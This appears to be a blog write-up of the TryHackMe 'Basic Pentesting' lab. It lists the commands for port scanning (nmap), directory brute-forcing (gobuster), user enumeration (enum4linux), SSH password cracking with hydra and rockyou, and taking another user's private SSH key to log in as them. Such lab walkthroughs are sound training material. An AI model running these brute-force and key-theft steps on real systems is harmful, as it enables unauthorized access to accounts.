THM Basic Pentesting


Deploy the machine and connect to our network

Find the services exposed by the machine

use nmap -sS -A -p- IP address to scan for open ports


22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

8009/tcp open ajp13

8080/tcp open http-proxy

What is the name of the hidden directory on the web server(enter name without /)?

use gobuster dir -u (ip) -w /usr/share/wordlists/dirb/common.txt to find for hidden directories:

found /development

User brute-forcing to find the username & password

use enum4linux -a (ip) to find for users:

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

use hydra with wordlist to crack password hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://(ip)

What is the username?


What is the password?


What service do you use to access the server(answer in abbreviation in all caps)?


Enumerate the machine to find any vectors for privilege escalation

Once inside the user jan, find user kay and list all hidden files. unable to cat pass.bak file. Found a hidden .ssh directory and the private key (id_rsa) is found.

Copy entire private key into a file (hash) and use python program to hash the key: python ssh2john.py hash > sshkey

What is the name of the other user you found(all lower case)?


If you have found another user, what can you do with this information?

use the new hash ssh key to login via ssh – ssh -i (path to hash ssh key) kay@(ip) this will enable to be log on as kay user and able to cat pass.bak file to find the final password

What is the final password you obtain?


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: